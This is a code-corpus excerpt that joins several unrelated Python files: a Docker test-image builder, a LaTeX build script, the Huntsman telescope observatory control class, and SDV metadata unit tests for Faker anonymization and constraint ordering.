create_container_volumes = _get_create_container_volumes(split_volumes)
create_container_binds = _get_create_container_binds(split_volumes)
container = docker_client.create_container(image=base_image_tag,
command=command,
volumes=create_container_volumes,
host_config=docker.utils.create_host_config(binds=create_container_binds))
docker_client.start(container=container['Id'])
log_to_client('Running commands to create new image:')
for line in docker_client.logs(container['Id'], stdout=True, stderr=True, stream=True):
log_to_client(line.strip())
exit_code = docker_client.wait(container['Id'])
if exit_code:
raise ImageCreationError(exit_code)
new_image = docker_client.commit(container=container['Id'])
try:
docker_client.remove_image(image=new_image_tag)
except:
log_to_client('Not able to remove image {}'.format(new_image_tag))
docker_client.tag(image=new_image['Id'], repository=new_image_tag, force=True)
docker_client.remove_container(container=container['Id'], v=True)
def _testing_spec(app_or_lib_name):
expanded_specs = get_expanded_libs_specs()
return spec_for_service(app_or_lib_name, expanded_specs)['test']
def test_image_name(app_or_lib_name):
return "dusty/test_{}".format(app_or_lib_name)
def _get_test_image_setup_command(app_or_lib_name):
return 'sh {}/{}'.format(constants.CONTAINER_COMMAND_FILES_DIR, dusty_command_file_name(app_or_lib_name))
def test_image_exists(app_or_lib_name):
image_name = test_image_name(app_or_lib_name)
docker_client = get_docker_client()
images = docker_client.images()
for image in images:
# Need to be careful, RepoTags can be explicitly set to None
repo_tags = image.get('RepoTags') or []
if image_name in repo_tags or '{}:latest'.format(image_name) in repo_tags:
return True
return False
def create_test_image(app_or_lib_name):
"""
Create a new test image by applying changes to the base image specified
in the app or lib spec
"""
log_to_client('Creating the testing image')
base_image_tag = _ensure_base_image(app_or_lib_name)
new_image_name = test_image_name(app_or_lib_name)
_create_tagged_image(base_image_tag, new_image_name, app_or_lib_name)
def update_test_image(app_or_lib_name):
"""
Apply updates to an existing testing image that has already been created
by Dusty - updating this test image should be quicker than creating a new
test image from the base image in the spec
"""
log_to_client('Updating the testing image')
if not test_image_exists(app_or_lib_name):
create_test_image(app_or_lib_name)
return
test_image_tag = test_image_name(app_or_lib_name)
_create_tagged_image(test_image_tag, test_image_tag, app_or_lib_name)
| StarcoderdataPython |
3319148 | import os
print("")
print(" Building report")
print("")
os.system("pdflatex manuel.tex")
os.system("makeindex manuel.tex")
os.system("pdflatex manuel.tex")
os.system("pdflatex manuel.tex")
print("")
print(" Clean directory")
print("")
files = ["manuel.aux", "manuel.log", "manuel.out", "manuel.glo", "manuel.ilg", "manuel.ind", "manuel.ist", "manuel.toc", "manuel.lof", "manuel.lot", "manuel.synctex.gz"]
for file in files:
if os.path.isfile(file):
os.remove(file) | StarcoderdataPython |
32182 | import time
from contextlib import suppress, contextmanager
from astropy import units as u
from panoptes.utils import error
from panoptes.utils.utils import get_quantity_value
from panoptes.utils.time import current_time, wait_for_events, CountdownTimer
from panoptes.pocs.observatory import Observatory
from panoptes.pocs.scheduler.observation.bias import BiasObservation
from huntsman.pocs.utils.logger import get_logger
from huntsman.pocs.guide.bisque import Guide
from huntsman.pocs.archive.utils import remove_empty_directories
from huntsman.pocs.scheduler.observation.dark import DarkObservation
from huntsman.pocs.utils.flats import make_flat_field_sequences, make_flat_field_observation
from huntsman.pocs.utils.flats import get_cameras_with_filter
from huntsman.pocs.utils.safety import get_solar_altaz
from huntsman.pocs.camera.group import CameraGroup, dispatch_parallel
from huntsman.pocs.error import NotTwilightError
class HuntsmanObservatory(Observatory):
def __init__(self, with_autoguider=True, hdr_mode=False, take_flats=True, logger=None,
*args, **kwargs):
"""Huntsman POCS Observatory
Args:
with_autoguider (bool, optional): If autoguider is attached, defaults to True.
hdr_mode (bool, optional): If pics should be taken in HDR mode, defaults to False.
take_flats (bool, optional): If flat field images should be taken, defaults to True.
logger (logger, optional): The logger instance. If not provided, use default Huntsman
logger.
*args: Parsed to Observatory init function.
**kwargs: Parsed to Observatory init function.
"""
if not logger:
logger = get_logger()
super().__init__(logger=logger, *args, **kwargs)
# Make a camera group
self.camera_group = CameraGroup(self.cameras)
self._has_hdr_mode = hdr_mode
self._has_autoguider = with_autoguider
self.flat_fields_required = take_flats
# Focusing
self.last_coarse_focus_time = None
self.last_coarse_focus_temp = None
self._coarse_focus_interval = self.get_config('focusing.coarse.interval_hours', 1) * u.hour
self._coarse_focus_filter = self.get_config('focusing.coarse.filter_name')
self._coarse_focus_temptol = self.get_config('focusing.coarse.temp_tol_deg', 5) * u.Celsius
self.last_fine_focus_time = None
self.last_fine_focus_temp = None
self._fine_focus_interval = self.get_config('focusing.fine.interval_hours', 1) * u.hour
self._fine_focus_temptol = self.get_config('focusing.fine.temp_tol_deg', 5) * u.Celsius
if self.has_autoguider:
self.logger.info("Setting up autoguider")
try:
self._create_autoguider()
except Exception as e:
self._has_autoguider = False
self.logger.warning(f"Problem setting autoguider, continuing without: {e!r}")
# Hack solution to the observatory not knowing whether it is safe or not
# This can be overridden when creating the HuntsmanPOCS instance
self._is_safe = None
# Properties
@property
def has_hdr_mode(self):
""" Does camera support HDR mode
Returns:
bool: HDR enabled, default False
"""
return self._has_hdr_mode
@property
def has_autoguider(self):
""" Does camera have attached autoguider
Returns:
bool: True if has autoguider
"""
return self._has_autoguider
@property
def coarse_focus_required(self):
""" Return True if we should do a coarse focus. """
return self._focus_required(coarse=True)
@property
def fine_focus_required(self):
""" Return True if we should do a fine focus. """
return self._focus_required()
@property
def is_past_midnight(self):
"""Check if it's morning, useful for going into either morning or evening flats."""
# Get the time of the nearest midnight to now
# If the nearest midnight is in the past, it's the morning
midnight = self.observer.midnight(current_time(), which='nearest')
return midnight < current_time()
@property
def is_twilight(self):
""" Return True if it is twilight, else False. """
return self.is_dark(horizon="twilight_max") and not self.is_dark(horizon="twilight_min")
@property
def temperature(self):
""" Return the ambient temperature. """
temp = None
try:
reading = self.db.get_current("weather")["data"]["ambient_temp_C"]
temp = get_quantity_value(reading, u.Celsius) * u.Celsius
except (KeyError, TypeError) as err:
self.logger.warning(f"Unable to determine temperature: {err!r}")
return temp
@property
def solar_altaz(self):
""" Return the current solar alt az. """
return get_solar_altaz(location=self.earth_location, time=current_time())
# Context managers
@contextmanager
def safety_checking(self, *args, **kwargs):
""" Check safety before and after the code block.
To be used with a "with" statement, e.g.:
with self.safety_checking():
print(x)
Args:
*args, **kwargs: Parsed to self._assert_safe
Raises:
RuntimeError: If not safe.
"""
self._assert_safe(*args, **kwargs)
try:
yield None
finally:
self._assert_safe(*args, **kwargs)
# Methods
def initialize(self):
"""Initialize the observatory and connected hardware """
super().initialize()
if self.has_autoguider:
self.logger.debug("Connecting to autoguider")
self.autoguider.connect()
def is_safe(self, park_if_not_safe=False, *args, **kwargs):
""" Return True if it is safe, else False.
Args:
*args, **kwargs: Parsed to self._is_safe. See panoptes.pocs.core.POCS.is_safe.
park_if_not_safe (bool): If True, park if safety fails. Default: False.
Returns:
bool: True if safe, else False.
"""
if self._is_safe is not None:
return self._is_safe(park_if_not_safe=park_if_not_safe, *args, **kwargs)
self.logger.warning("Safety function not set. Returning False")
return False
def remove_camera(self, cam_name):
""" Remove a camera from the observatory.
Args:
cam_name (str): The name of the camera to remove.
"""
super().remove_camera(cam_name)
with suppress(KeyError):
del self.camera_group.cameras[cam_name]
def autofocus_cameras(self, coarse=False, filter_name=None, default_timeout=900,
blocking=True, **kwargs):
""" Override autofocus_cameras to update the last focus time and move filterwheels.
Args:
coarse (bool, optional): Perform coarse focus? Default False.
filter_name (str, optional): The filter name to focus with. If None (default), will
attempt to get from config, by default using the coarse focus filter.
*args, **kwargs: Parsed to `pocs.observatory.Observatory.autofocus_cameras`.
Returns:
threading.Event: The autofocus event.
"""
focus_type = "coarse" if coarse else "fine"
# Choose the filter to focus with
# TODO: Move this logic to the camera level
if filter_name is None:
if coarse:
filter_name = self._coarse_focus_filter
else:
try:
filter_name = self.current_observation.filter_name
except AttributeError:
filter_name = self._coarse_focus_filter
self.logger.warning("Unable to retrieve filter name from current observation."
f" Defaulting to coarse focus filter ({filter_name}).")
# Asyncronously dispatch autofocus calls
with self.safety_checking(horizon="focus"):
events = self.camera_group.autofocus(coarse=coarse, filter_name=filter_name, **kwargs)
# Wait for sequences to finish
if blocking:
timeout = self.get_config(f"focusing.{focus_type}.timeout", default_timeout)
if not wait_for_events(list(events.values()), timeout=timeout):
raise error.Timeout(f"Timeout of {timeout} reached while waiting for fine focus.")
# Update last focus time
setattr(self, f"last_{focus_type}_focus_time", current_time())
# Update last focus temperature
setattr(self, f"last_{focus_type}_focus_temp", self.temperature)
return events
def cleanup_observations(self, *args, **kwargs):
""" Override method to remove empty directories. Called in housekeeping state."""
super().cleanup_observations(*args, **kwargs)
self.logger.info("Removing empty directories in images directory.")
images_dir = self.get_config("directories.images")
remove_empty_directories(images_dir)
self.logger.info("Removing empty directories in archive directory.")
archive_dir = self.get_config("directories.archive")
remove_empty_directories(archive_dir)
def take_flat_fields(self, cameras=None, **kwargs):
""" Take flat fields for each camera in each filter, respecting filter order.
Args:
cameras (dict): Dict of cam_name: camera pairs. If None (default), use all cameras.
**kwargs: Overrides config entries under `calibs.flat`.
"""
if cameras is None:
cameras = self.cameras
# Load the flat field config, allowing overrides from kwargs
flat_config = self.get_config('calibs.flat', default=dict())
flat_config.update(kwargs)
# Specify filter order
filter_order = flat_config['filter_order'].copy()
if self.is_past_midnight: # If it's the morning, order is reversed
filter_order.reverse()
# Take flat fields in each filter
for filter_name in filter_order:
if not (self.is_safe(horizon="twilight_max") and self.is_twilight):
raise RuntimeError("Not safe for twilight flats. Aborting.")
# Get a dict of cameras that have this filter
cameras_with_filter = get_cameras_with_filter(cameras, filter_name)
# Go to next filter if there are no cameras with this one
if not cameras_with_filter:
self.logger.warning(f'No cameras found with {filter_name} filter.')
continue
# Get the flat field observation
observation = make_flat_field_observation(self.earth_location, filter_name=filter_name)
observation.seq_time = current_time(flatten=True)
# Take the flats for each camera in this filter
self.logger.info(f'Taking flat fields in {filter_name} filter.')
autoflat_config = flat_config.get("autoflats", {})
try:
self._take_autoflats(cameras_with_filter, observation, **autoflat_config)
# Break out of loop if no longer twilight
# Catch the error so the state machine keeps running
except NotTwilightError as err:
self.logger.warning(f"{err!r}")
break
self.logger.info('Finished flat-fielding.')
def prepare_cameras(self, drop=True, *args, **kwargs):
""" Make sure cameras are all cooled and ready.
Args:
drop (bool): If True, drop cameras that do not become ready in time. Default: True.
*args, **kwargs: Parsed to self.camera_group.wait_until_ready.
"""
self.logger.info(f"Preparing {len(self.cameras)} cameras.")
failed_cameras = self.camera_group.wait_until_ready(*args, **kwargs)
# Remove cameras that didn't become ready in time
if drop:
for cam_name in failed_cameras:
self.logger.debug(f'Removing {cam_name} from {self} for not being ready.')
self.remove_camera(cam_name)
def take_observation_block(self, observation, cameras=None, timeout=60 * u.second,
remove_on_error=False, do_focus=True, safety_kwargs=None,
do_slew=True):
""" Macro function to take an observation block.
This function will perform:
- slewing (when necessary)
- fine focusing (when necessary)
- observation exposures
- safety checking
Args:
observation (Observation): The observation object.
cameras (dict, optional): Dict of cam_name: camera pairs. If None (default), use all
cameras.
timeout (float, optional): The timeout in addition to the exposure time. Default 60s.
remove_on_error (bool, default False): If True, remove cameras that timeout. If False,
raise a TimeoutError instead.
do_slew (bool, optional): If True, do not attempt to slew the telescope. Default
False.
**safety_kwargs (dict, optional): Extra kwargs to be parsed to safety function.
Raises:
RuntimeError: If safety check fails.
"""
if cameras is None:
cameras = self.cameras
safety_kwargs = {} if safety_kwargs is None else safety_kwargs
self._assert_safe(**safety_kwargs)
# Set the sequence time of the observation
if observation.seq_time is None:
observation.seq_time = current_time(flatten=True)
headers = self.get_standard_headers(observation=observation)
# Take the observation block
self.logger.info(f"Starting observation block for {observation}")
# The start new set flag is True before we enter the loop and is set to False
# immediately inside the loop. This allows the loop to start a new set in case
# the set_is_finished condition is already satisfied.
start_new_set = True
current_field = None
while (start_new_set or not observation.set_is_finished):
start_new_set = False # We don't want to start another set after this one
# Perform the slew if necessary
slew_required = (current_field != observation.field) and do_slew
if slew_required:
with self.safety_checking(**safety_kwargs):
self.slew_to_observation(observation)
current_field = observation.field
# Fine focus the cameras if necessary
focus_required = self.fine_focus_required or observation.current_exp_num == 0
if do_focus and focus_required:
with self.safety_checking(**safety_kwargs):
self.autofocus_cameras(blocking=True, filter_name=observation.filter_name)
# Set a common start time for this batch of exposures
headers['start_time'] = current_time(flatten=True)
# Start the exposures and get events
with self.safety_checking(**safety_kwargs):
events = self.camera_group.take_observation(observation, headers=headers)
# Wait for the exposures (blocking)
# TODO: Use same timeout as camera client
try:
self._wait_for_camera_events(events, duration=observation.exptime + timeout,
remove_on_error=remove_on_error, **safety_kwargs)
except error.Timeout as err:
self.logger.error(f"{err!r}")
self.logger.warning("Continuing with observation block after error.")
# Explicitly mark the observation as complete
with suppress(AttributeError):
observation.mark_exposure_complete()
self.logger.info(f"Observation status: {observation.status}")
def take_dark_observation(self, bias=False, **kwargs):
""" Take a bias observation block on each camera (blocking).
Args:
bias (bool, optional): If True, take Bias observation instead of dark observation.
Default: False.
**kwargs: Parsed to `self.take_observation_block`.
"""
# Move telescope to park position
if not self.mount.is_parked:
self.logger.info("Moving telescope to park position for dark observation.")
self.mount.park()
# Create the observation
# Keep the mount where it is since we are just taking darks
position = self.mount.get_current_coordinates()
ObsClass = BiasObservation if bias else DarkObservation
observation = ObsClass(position=position)
# Dark observations don't care if it's dark or not
safety_kwargs = {"ignore": ["is_dark"]}
# Can ignore weather safety if dome is closed
with suppress(AttributeError):
if self.dome.is_closed:
self.logger.warning(f"Ignoring weather safety for {observation}.")
safety_kwargs["ignore"].append("good_weather")
# Take the observation (blocking)
self.take_observation_block(observation, do_focus=False, do_slew=False,
safety_kwargs=safety_kwargs, **kwargs)
def slew_to_observation(self, observation, min_solar_alt=10 * u.deg):
""" Slew to the observation field coordinates.
Args:
observation (Observation): The observation object.
min_solar_alt (astropy.Quantity, optional): The minimum solar altitude above which the
FWs will be moved to their dark positions before slewing.
"""
self.logger.info(f"Slewing to target coordinates for {observation}.")
if not self.mount.set_target_coordinates(observation.field.coord):
raise RuntimeError(f"Unable to set target coordinates for {observation.field}.")
# Move FWs to dark pos if Sun too high to minimise damage potential
move_fws = self.solar_altaz.alt > get_quantity_value(min_solar_alt, u.deg) * u.deg
if move_fws:
self.logger.warning("Solar altitude above minimum for safe slew. Moving FWs to dark"
" positions.")
# Record curent positions so we can put them back after slew
# NOTE: These positions could include the dark position so can't use last_light_position
current_fw_positions = {}
for cam_name, cam in self.cameras.items():
if cam.has_filterwheel:
current_fw_positions[cam_name] = cam.filterwheel.current_filter
self.camera_group.filterwheel_move_to(current_fw_positions)
self.mount.slew_to_target()
if move_fws:
self.logger.info("Moving FWs back to last positions.")
self.camera_group.filterwheel_move_to(current_fw_positions)
# Private methods
def _create_autoguider(self):
guider_config = self.get_config('guider')
guider = Guide(**guider_config)
self.autoguider = guider
def _take_autoflats(
self, cameras, observation, target_scaling=0.17, scaling_tolerance=0.05, timeout=60,
bias=32, remove_on_error=False, sleep_time=300, evening_initial_flat_exptime=0.01,
morning_initial_flat_exptime=1, **kwargs):
""" Take flat fields using automatic updates for exposure times.
Args:
cameras (dict): Dict of camera name: Camera pairs.
observation: The flat field observation. TODO: Integrate with FlatFieldSequence.
target_scaling (float, optional): Required to be between [0, 1] so
target_adu is proportionally between 0 and digital saturation level.
Default: 0.17.
scaling_tolerance (float, optional): The minimum precision on the average counts
required to keep the exposure, expressed as a fraction of the dynamic range.
Default: 0.05.
timeout (float): The timeout on top of the exposure time, default 60s.
bias (int): The bias to subtract from the frames. TODO: Use a real bias image!
remove_on_error (bool, default False): If True, remove cameras that timeout. If False,
raise a TimeoutError instead.
**kwargs: Parsed to FlatFieldSequence.
"""
# set the initial exposure time
if self.is_past_midnight:
initial_exptime = morning_initial_flat_exptime
else:
initial_exptime = evening_initial_flat_exptime
# Create a flat field sequence for each camera
sequences = make_flat_field_sequences(cameras, target_scaling, scaling_tolerance,
bias, initial_exposure_time=initial_exptime, **kwargs)
# Loop until sequence has finished
self.logger.info(f"Starting flat field sequence for {len(self.cameras)} cameras.")
while True:
if not self.is_twilight:
raise NotTwilightError("No longer twilight. Aborting flat fields.")
# Slew to field
with self.safety_checking(horizon="twilight_max"):
self.slew_to_observation(observation)
# Get standard fits headers
headers = self.get_standard_headers(observation=observation)
events = {}
exptimes = {}
filenames = {}
start_times = {}
# Define function to start the exposures
def func(cam_name):
seq = sequences[cam_name]
camera = cameras[cam_name]
# Get exposure time, filename and current time
exptimes[cam_name] = seq.get_next_exptime(past_midnight=self.is_past_midnight)
filenames[cam_name] = observation.get_exposure_filename(camera)
start_times[cam_name] = current_time()
try:
events[cam_name] = camera.take_observation(
observation, headers=headers, filename=filenames[cam_name],
exptime=exptimes[cam_name])
except error.PanError as err:
self.logger.error(f"{err!r}")
self.logger.warning("Continuing with flat observation after error.")
# Start the exposures in parallel
dispatch_parallel(func, list(cameras.keys()))
# Wait for the exposures
self.logger.info('Waiting for flat field exposures to complete.')
duration = get_quantity_value(max(exptimes.values()), u.second) + timeout
try:
self._wait_for_camera_events(events, duration, remove_on_error=remove_on_error,
horizon="twilight_max")
except error.Timeout as err:
self.logger.error(f"{err!r}")
self.logger.warning("Continuing with flat observation after timeout error.")
# Mark the current exposure as complete
observation.mark_exposure_complete()
# Update the flat field sequences with new data
for cam_name in list(sequences.keys()):
# Remove sequence for any removed cameras
if cam_name not in self.cameras:
del sequences[cam_name]
continue
# Attempt to update the exposure sequence for this camera.
# If the exposure failed, use info from the last successful exposure.
try:
sequences[cam_name].update(filename=filenames[cam_name],
exptime=exptimes[cam_name],
time_start=start_times[cam_name])
except (KeyError, FileNotFoundError) as err:
self.logger.warning(f"Unable to update flat field sequence for {cam_name}:"
f" {err!r}")
# Log sequence status
status = sequences[cam_name].status
status["filter_name"] = observation.filter_name
self.logger.info(f"Flat field status for {cam_name}: {status}")
# Check if sequences are complete
if all([s.is_finished for s in sequences.values()]):
self.logger.info("All flat field sequences finished.")
break
# Check if counts are ok
if self.is_past_midnight:
# Terminate if Sun is coming up and all exposures are too bright
if all([s.min_exptime_reached for s in sequences.values()]):
self.logger.info(f"Terminating flat sequence for {observation.filter_name}"
f" filter because min exposure time reached.")
break
# Wait if Sun is coming up and all exposures are too faint
elif all([s.max_exptime_reached for s in sequences.values()]):
self.logger.info(f"All exposures are too faint. Waiting for {sleep_time}s")
self._safe_sleep(sleep_time, horizon="twilight_max")
else:
# Terminate if Sun is going down and all exposures are too faint
if all([s.max_exptime_reached for s in sequences.values()]):
self.logger.info(f"Terminating flat sequence for {observation.filter_name}"
f" filter because max exposure time reached.")
break
# Wait if Sun is going down and all exposures are too bright
elif all([s.max_exptime_reached for s in sequences.values()]):
self.logger.info(f"All exposures are too bright. Waiting for {sleep_time}s")
self._safe_sleep(sleep_time, horizon="twilight_max")
def _wait_for_camera_events(self, events, duration, remove_on_error=False, sleep=1, **kwargs):
""" Wait for camera events to be set.
Args:
events (dict of camera_name: threading.Event): The events to wait for.
duration (float): The total amount of time to wait for (should include exptime).
remove_on_error (bool, default False): If True, remove cameras that timeout. If False,
raise a TimeoutError instead.
sleep (float): Sleep this long between event checks. Default 1s.
**kwargs: Parsed to self._assert_safe.
"""
self.logger.debug(f'Waiting for {len(events)} events with timeout of {duration}.')
timer = CountdownTimer(duration)
while not timer.expired():
# Check safety here
self._assert_safe(**kwargs)
# Check if all cameras have finished
if all([e.is_set() for e in events.values()]):
break
time.sleep(sleep)
# Make sure events are set
for cam_name, event in events.items():
if not event.is_set():
if remove_on_error:
self.logger.warning(f"Timeout while waiting for camera event on {cam_name}. "
"Removing from observatory.")
self.remove_camera(cam_name)
else:
raise error.Timeout(f"Timeout while waiting for camera event on {cam_name}.")
def _focus_required(self, coarse=False):
""" Check if a focus is required based on current conditions.
Args:
coarse (bool): If True, check if we need to do a coarse focus. Default: False.
Returns:
bool: True if focus required, else False.
"""
focus_type = "coarse" if coarse else "fine"
# If a long time period has passed then focus again
last_focus_time = getattr(self, f"last_{focus_type}_focus_time")
interval = getattr(self, f"_{focus_type}_focus_interval")
if last_focus_time is None: # If we haven't focused yet
self.logger.info(f"{focus_type} focus required because we haven't focused yet.")
return True
if current_time() - last_focus_time > interval:
self.logger.info(f"{focus_type} focus required because of time difference.")
return True
# If there has been a large change in temperature then we need to focus again
last_focus_temp = getattr(self, f"last_{focus_type}_focus_temp")
temptol = getattr(self, f"_{focus_type}_focus_temptol")
if (last_focus_temp is not None) and (self.temperature is not None):
if abs(last_focus_temp - self.temperature) > temptol:
self.logger.info(f"{focus_type} focus required because of temperature change.")
return True
return False
def _assert_safe(self, *args, **kwargs):
""" Raise a RuntimeError if not safe to continue.
TODO: Raise a custom error type indicating lack of safety.
Args:
*args, **kwargs: Parsed to self.is_safe.
"""
if not self.is_safe(*args, **kwargs):
raise RuntimeError("Safety check failed!")
def _safe_sleep(self, duration, interval=1, *args, **kwargs):
""" Sleep for a specified amount of time while ensuring safety.
A RuntimeError is raised if safety fails while waiting.
Args:
duration (float or Quantity): The time to wait.
interval (float): The time in between safety checks.
*args, **kwargs: Parsed to is_safe.
Raises:
RuntimeError: If safety fails while waiting.
"""
self.logger.debug(f"Safe sleeping for {duration}")
timer = CountdownTimer(duration)
while not timer.expired():
self._assert_safe(*args, **kwargs)
time.sleep(interval)
| StarcoderdataPython |
46837 | from unittest.mock import Mock, patch
import pandas as pd
import pytest
from faker import Faker
from faker.config import DEFAULT_LOCALE
from rdt.transformers.numerical import NumericalTransformer
from sdv.constraints.base import Constraint
from sdv.constraints.errors import MissingConstraintColumnError
from sdv.errors import ConstraintsNotMetError
from sdv.metadata import Table
class TestTable:
def test__get_faker_default_locale(self):
"""Test that ``_get_faker`` without locales parameter has default locale.
The ``_get_faker`` should return a Faker object localized to the default locale.
When no locales are specified explicitly.
Input:
- Field metadata from metadata dict.
Output:
- Faker object with default localization.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'company'
}
}
}
# Run
faker = Table.from_dict(metadata_dict)._get_faker(metadata_dict['fields']['foo'])
# Assert
assert isinstance(faker, Faker)
assert faker.locales == [DEFAULT_LOCALE]
def test__get_faker_specified_locales_string(self):
"""Test that ``_get_faker`` with locales parameter sets localization correctly.
The ``_get_faker`` should return a Faker object localized to the specified locale.
Input:
- Field metadata from metadata dict.
Output:
- Faker object with specified localization string.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'company',
'pii_locales': 'sv_SE'
}
}
}
# Run
faker = Table.from_dict(metadata_dict)._get_faker(metadata_dict['fields']['foo'])
# Assert
assert isinstance(faker, Faker)
assert faker.locales == ['sv_SE']
def test__get_faker_specified_locales_list(self):
"""Test that ``_get_faker`` with locales parameter sets localization correctly.
The ``_get_faker`` should return a Faker object localized to the specified locales.
Input:
- Field metadata from metadata dict.
Output:
- Faker object with specified list of localizations.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'company',
'pii_locales': ['en_US', 'sv_SE']
}
}
}
# Run
faker = Table.from_dict(metadata_dict)._get_faker(metadata_dict['fields']['foo'])
# Assert
assert isinstance(faker, Faker)
assert faker.locales == ['en_US', 'sv_SE']
def test__get_faker_method_pass_args(self):
"""Test that ``_get_faker_method`` method utilizes parameters passed in category argument.
The ``_get_faker_method`` method uses the parameters passed to it in the category argument.
Input:
- Faker object to create faked values with.
- Category tuple of category name and parameters passed to the method creating fake values.
Output:
- Fake values created with the specified method from the Faker object.
Utilizing the arguments given to it.
"""
# Setup
metadata_dict = {
'fields': {
'foo': {
'type': 'categorical',
'pii': True,
'pii_category': 'ean'
}
}
}
metadata = Table.from_dict(metadata_dict)
# Run
fake_8_ean = metadata._get_faker_method(Faker(), ('ean', 8))
ean_8 = fake_8_ean()
fake_13_ean = metadata._get_faker_method(Faker(), ('ean', 13))
ean_13 = fake_13_ean()
# Assert
assert len(ean_8) == 8
assert len(ean_13) == 13
@patch('sdv.metadata.Table')
def test__make_anonymization_mappings(self, mock_table):
"""Test that ``_make_anonymization_mappings`` creates the expected mappings.
The ``_make_anonymization_mappings`` method should map values in the original
data to fake values for non-id fields that are labeled pii.
Setup:
- Create a Table that has metadata about three fields (one pii field, one id field,
and one non-pii field).
Input:
- Data that contains a pii field, an id field, and a non-pii field.
Side Effects:
- Expect ``_get_fake_values`` to be called with the number of unique values of the
pii field.
- Expect the resulting `_ANONYMIZATION_MAPPINGS` field to contain the pii field, with
the correct number of mappings and keys.
"""
# Setup
metadata = Mock()
metadata._ANONYMIZATION_MAPPINGS = {}
foo_metadata = {
'type': 'categorical',
'pii': True,
'pii_category': 'email',
}
metadata._fields_metadata = {
'foo': foo_metadata,
'bar': {
'type': 'categorical',
},
'baz': {
'type': 'id',
}
}
foo_values = ['<EMAIL>', '<EMAIL>', '<EMAIL>']
data = pd.DataFrame({
'foo': foo_values,
'bar': ['a', 'b', 'c'],
'baz': [1, 2, 3],
})
# Run
Table._make_anonymization_mappings(metadata, data)
# Assert
assert mock_table._get_fake_values.called_once_with(foo_metadata, 3)
mappings = metadata._ANONYMIZATION_MAPPINGS[id(metadata)]
assert len(mappings) == 1
foo_mappings = mappings['foo']
assert len(foo_mappings) == 3
assert list(foo_mappings.keys()) == foo_values
@patch('sdv.metadata.Table')
def test__make_anonymization_mappings_unique_faked_value_in_field(self, mock_table):
"""Test that ``_make_anonymization_mappings`` method creates mappings for anonymized values.
The ``_make_anonymization_mappings`` method should map equal values in the original data
to the same faked value.
Input:
- DataFrame with a field that should be anonymized based on the metadata description.
Side Effect:
- Mappings are created from the original values to faked values.
"""
# Setup
metadata = Mock()
metadata._ANONYMIZATION_MAPPINGS = {}
foo_metadata = {
'type': 'categorical',
'pii': True,
'pii_category': 'email'
}
metadata._fields_metadata = {
'foo': foo_metadata
}
data = pd.DataFrame({
'foo': ['<EMAIL>', '<EMAIL>', '<EMAIL>']
})
# Run
Table._make_anonymization_mappings(metadata, data)
# Assert
assert mock_table._get_fake_values.called_once_with(foo_metadata, 2)
mappings = metadata._ANONYMIZATION_MAPPINGS[id(metadata)]
assert len(mappings) == 1
foo_mappings = mappings['foo']
assert len(foo_mappings) == 2
assert list(foo_mappings.keys()) == ['<EMAIL>', '<EMAIL>']
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints by putting
constraints with ``rebuild_columns`` before the ones without them.
Input:
- list of constraints with some having ``rebuild_columns``
before constraints without them.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = []
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints_none_rebuild_columns(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints with None as
``rebuild_columns`` before those that have them.
Input:
- list of constraints with some having None as ``rebuild_columns``
listed after those with ``rebuild_columns``.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = None
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_validates_constraint_order(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If no constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, no exception should be raised.
Input:
- List of constraints with none having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Output:
- Sorted list of constraints.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['e', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Assert
assert sorted_constraints == constraints
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_invalid_order_raises_exception(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If one constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, an exception should be raised.
Input:
- List of constraints with some having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Side Effect:
- Exception should be raised.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['a', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
with pytest.raises(Exception):
Table._prepare_constraints(constraints)
